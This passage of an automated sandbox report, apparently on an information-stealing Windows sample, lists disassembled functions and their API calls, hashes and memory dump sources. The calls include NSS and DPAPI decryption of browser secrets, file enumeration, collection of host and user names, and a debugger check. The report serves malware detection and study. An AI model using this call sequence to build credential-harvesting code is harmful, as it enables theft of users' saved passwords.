Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406050 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00412A80 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412ABA
lstrcat.KERNEL32(?,02F66690), ref: 00412AD8

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: db7ba532159b08be4b97e69067dd13966bc0bdbae1d3d5976b6b0117e0df4a87
Instruction ID: bcc253f25bf78e1a0e90404f031f6467c50b05fa57c941630bc3dd144581bb5c
Opcode Fuzzy Hash: db7ba532159b08be4b97e69067dd13966bc0bdbae1d3d5976b6b0117e0df4a87
Instruction Fuzzy Hash: 8701B97A900608B7CB24FBB0DC47EDA773D9B54705F404189B64956091EE78AAC4CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00401060 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415490 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fcd7212be9d9cc950af72ce96ac18942da04811e261a1c65db4c3aaed9ff6651
Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
Opcode Fuzzy Hash: fcd7212be9d9cc950af72ce96ac18942da04811e261a1c65db4c3aaed9ff6651
Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004154E0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: aab914ecba9bdd74f7952373867dd33bdee27b161c6f8cf2aefa04b203c20174
Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
Opcode Fuzzy Hash: aab914ecba9bdd74f7952373867dd33bdee27b161c6f8cf2aefa04b203c20174
Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00401150 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,02F61980,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

ExitProcess.KERNEL32 ref: 00401186

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD

Uniqueness

Uniqueness Score: -1.00%

Function 00414FF0 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00414FF8

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004121F0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
HeapAlloc.KERNEL32(00000000), ref: 00412207
wsprintfA.USER32 ref: 00412223
FindFirstFileA.KERNEL32(?,?), ref: 0041223A
StrCmpCA.SHLWAPI(?,0041D84C), ref: 00412268
StrCmpCA.SHLWAPI(?,0041D850), ref: 0041227E
FindNextFileA.KERNEL32(000000FF,?), ref: 004122FF
FindClose.KERNEL32(000000FF), ref: 00412314
lstrcat.KERNEL32(?,02F61C20), ref: 00412339
lstrcat.KERNEL32(?,02F65A50), ref: 0041234C
lstrlen.KERNEL32(?), ref: 00412359
lstrlen.KERNEL32(?), ref: 0041236A

Strings

%s\*, xrefs: 00412217
%s\%s, xrefs: 00412295

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 13328894-2848263008
Opcode ID: 360cf5248b22f44b8429476b3986cf3458239551f0eb4c76a4fd81c8879d788d
Instruction ID: 68eafe57ffc654504e5fb8166b756e3a47007b1446461b295be9b39175aa6662
Opcode Fuzzy Hash: 360cf5248b22f44b8429476b3986cf3458239551f0eb4c76a4fd81c8879d788d
Instruction Fuzzy Hash: 5551A6B5940618ABCB20EBB0DC89FEE737DAB98300F404689F61A96150DF749BC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF90 Relevance: 16.6, APIs: 11, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040BFC3
lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02F619E0), ref: 0040BFE1
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
PK11_GetInternalKeySlot.NSS3 ref: 0040BFFA
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C015
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C05B
memcpy.MSVCRT ref: 0040C082
lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
PK11_FreeSlot.NSS3(?), ref: 0040C0D1
lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
String ID:
API String ID: 3428224297-0
Opcode ID: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
Instruction ID: c615a08a89d19efff62b5a0e6981dcd2a682f0599fa2db432923c9597831d409
Opcode Fuzzy Hash: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
Instruction Fuzzy Hash: 22417E75D0420ADBDB20CF90DD88BEEBBB9BB48340F1041A9E605A72C0DB745A84CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040D540 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,0041D746), ref: 0040D58E
StrCmpCA.SHLWAPI(?,0041DC28), ref: 0040D5DE
StrCmpCA.SHLWAPI(?,0041DC2C), ref: 0040D5F4
FindNextFileA.KERNEL32(000000FF,?), ref: 0040DB0A
FindClose.KERNEL32(000000FF), ref: 0040DB1C

Strings

[@, xrefs: 0040D562, 0040DB2A, 0040D623, 0040D5A5, 0040D626
\*.*, xrefs: 0040D556

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: [@$\*.*
API String ID: 2325840235-1445036518
Opcode ID: 72c2c17873a21f2babb8c24e101f72d36ce91ddf54f13b01004097bc75a73fd5
Instruction ID: 5086e1dd9f189559ddbff5738d7534b81ef4efc7c2da90a7a59429af0ff5c2f4
Opcode Fuzzy Hash: 72c2c17873a21f2babb8c24e101f72d36ce91ddf54f13b01004097bc75a73fd5
Instruction Fuzzy Hash: 27F1E3759142189ACB15FB61DC91EDE7739AF54304F8142DFA40A62091EF34AFC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 6C9A6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C951C6F,00000000,00000004,?,?), ref: 6C9A6C3F

Part of subcall function 6C9FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9FC2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C951C6F,00000000,00000004,?,?), ref: 6C9A6C60
PR_ExplodeTime.NSS3(00000000,6C951C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C951C6F,00000000,00000004,?,?), ref: 6C9A6C94

Strings

gfff, xrefs: 6C9A6CF5
gfff, xrefs: 6C9A6D66
gfff, xrefs: 6C9A6D30
gfff, xrefs: 6C9A6CFD
gfff, xrefs: 6C9A6D9C

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 5d6c9433502695ae6155da8a9ea400fa51681aeba1886d75d62a3ee1eb24ecbf
Instruction ID: f39b75c06b128a3eb06ee8458674e90b6e6b82838fa4207a5152f6b28582d089
Opcode Fuzzy Hash: 5d6c9433502695ae6155da8a9ea400fa51681aeba1886d75d62a3ee1eb24ecbf
Instruction Fuzzy Hash: 7D513B72B016494FC71CCDADDC526DABBDAABA4310F48C23AE442DB781D638D907C751

Uniqueness

Uniqueness Score: -1.00%

Function 6CA0A480 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 235COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CA2C3A2,?,?,00000000,00000000), ref: 6CA0A528
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA0A6E0
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA0A71B
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA0A738

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA0A6CA
%s at line %d of [%.10s], xrefs: 6CA0A6D9
database corruption, xrefs: 6CA0A6D4

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: _byteswap_ushort$_byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 622669576-598938438
Opcode ID: 36e3a7e1f19d34615744baf5269004790c5ed09ae2abf754a6595fbcd9a435f6
Instruction ID: 499b8fa8d95e04a0b76f9822a018aebb1e8e8f2a7463fbf4bfd2430a4d18ab7e
Opcode Fuzzy Hash: 36e3a7e1f19d34615744baf5269004790c5ed09ae2abf754a6595fbcd9a435f6
Instruction Fuzzy Hash: 9F91D1717083018BC714CF29D49066AB7F2BF48358F494A6DE8958BB91EB70ECC4CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6C964420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?), ref: 6C964444
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C964466

Part of subcall function 6C9B1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C9588A4,00000000,00000000), ref: 6C9B1228
Part of subcall function 6C9B1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C9B1238
Part of subcall function 6C9B1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C9588A4,00000000,00000000), ref: 6C9B124B
Part of subcall function 6C9B1200: PR_CallOnce.NSS3(6CAB2AA4,6C9B12D0,00000000,00000000,00000000,?,6C9588A4,00000000,00000000), ref: 6C9B125D
Part of subcall function 6C9B1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C9B126F
Part of subcall function 6C9B1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C9B1280
Part of subcall function 6C9B1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C9B128E
Part of subcall function 6C9B1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C9B129A
Part of subcall function 6C9B1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C9B12A1

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C96447A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C96448A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C964494

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Util$Item_Zfree$ArenaCriticalFreePoolSectionfree$Arena_CallClearDeleteEnterOnceUnlockValuememset
String ID:
API String ID: 241050562-0
Opcode ID: c6eb4c5c506eb523f6555e3cbef186ce5f5d11e130d5d74bb2e2551290495a12
Instruction ID: 460683717e64be24ec36077f8a1ec2a257d9fca9bb22eb0d005d24913dd27224
Opcode Fuzzy Hash: c6eb4c5c506eb523f6555e3cbef186ce5f5d11e130d5d74bb2e2551290495a12
Instruction Fuzzy Hash: 5C11A5B2D007059BE720CFA59C855A7B7F8FF6925CB044B2EE88D52A00F371F5988790

Uniqueness

Uniqueness Score: -1.00%

Function 00417B4E Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00418E46
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00418E5B
UnhandledExceptionFilter.KERNEL32(0041C690), ref: 00418E66
GetCurrentProcess.KERNEL32(C0000409), ref: 00418E82
TerminateProcess.KERNEL32(00000000), ref: 00418E89

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
Instruction ID: 5828a94612e18b022276c58097a982c86e574ee0b254963d5fd3238681fe770b
Opcode Fuzzy Hash: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
Instruction Fuzzy Hash: 2D21C274A01304EFC721EF54F944B843BB4FB8C309F91907AE64987260E7B456868F9D

Uniqueness

Uniqueness Score: -1.00%

Function 00406C10 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660), ref: 00406C1D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C24
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00406C51
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,`v@,80000001,h0A), ref: 00406C74
LocalFree.KERNEL32(?,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C7E

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
Instruction ID: a62b9dfe9577ca48fe2f29d604933a8f18b811f44e231435f7e1fa1bbfb2df61
Opcode Fuzzy Hash: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
Instruction Fuzzy Hash: 01011275A40708BBEB20DF94CD45F9E7779EB44B05F104155F706FB2C0D670AA118BA9

Uniqueness

Uniqueness Score: -1.00%

Function 6C9E25B0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

